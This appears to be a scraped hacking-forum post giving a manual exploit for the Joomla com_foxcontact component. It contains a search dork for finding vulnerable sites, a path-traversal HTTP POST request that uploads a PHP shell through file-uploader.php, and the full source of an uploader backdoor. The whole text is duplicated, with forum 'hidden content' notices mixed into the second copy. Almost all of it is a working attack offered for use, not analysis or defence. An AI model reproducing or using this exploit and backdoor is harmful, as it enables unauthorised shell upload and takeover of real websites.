Manual Exploit com_foxcontact shell upload
We will use any header injection tool
I will use a burp suite
dork inurl:com_foxcontact
-HTTP Header Example-
POST http://127.0.0.1/components/com_foxcontact/lib/file-uploader.php?cid=490&mid=0&qqfile=/../../up.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-File-Name: shell.php
Content-Type: image/jpeg
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
<?php cmd or file upload ?>
############################
Shell path:
www.site.com/components/com_foxcontact/filename.php
###########################
my script upload
<?php
echo "<center>";
$files = @$_FILES["files"];
if ($files["name"] != '') {
$fullpath = $_REQUEST["path"] . $files["name"];
if (move_uploaded_file($files['tmp_name'], $fullpath)) {
echo "<h1><a href='$fullpath'>upload successful ^__^</a></h1>";
}
}echo '
<img src="http://www.sqorebda3.com/vb/Photo/new_1422333365_894.gif"> <br><br><br><br>
<html><head><title>file upload by sohaip-hackerDZ</title></head><body>
<style type="text/css">
body{
background-color: #000000;
font: bold;
font-size: 20px;
}
b{
color:#FF0000;
font-size: 20px;
}
</style>
<b>file upload by sohaip-hackerDZ<b><br><br>
<form method=POST enctype="multipart/form-data" action=""><input type="file" name="files"><input type=submit value="Upl0Ad"></form></body></html>';
echo "<center/>";
?>
video
We will use any header injection tool
I will use a burp suite
dork inurl:com_foxcontact
-HTTP Header Example-
View hidden content is available for registered users!
POST http://127.0.0.1/components/com_foxcontact/lib/file-uploader.php?cid=490&mid=0&qqfile=/../../up.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-File-Name: shell.php
Content-Type: image/jpeg
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
<?php cmd or file upload ?>
############################
Shell path:
View hidden content is available for registered users!
www.site.com/components/com_foxcontact/filename.php
###########################
my script upload
View hidden content is available for registered users!
<?php
echo "<center>";
$files = @$_FILES["files"];
if ($files["name"] != '') {
$fullpath = $_REQUEST["path"] . $files["name"];
if (move_uploaded_file($files['tmp_name'], $fullpath)) {
echo "<h1><a href='$fullpath'>upload successful ^__^</a></h1>";
}
}echo '
<img src="http://www.sqorebda3.com/vb/Photo/new_1422333365_894.gif"> <br><br><br><br>
<html><head><title>file upload by sohaip-hackerDZ</title></head><body>
<style type="text/css">
body{
background-color: #000000;
font: bold;
font-size: 20px;
}
b{
color:#FF0000;
font-size: 20px;
}
</style>
<b>file upload by sohaip-hackerDZ<b><br><br>
<form method=POST enctype="multipart/form-data" action=""><input type="file" name="files"><input type=submit value="Upl0Ad"></form></body></html>';
echo "<center/>";
?>
video
View hidden content is available for registered users!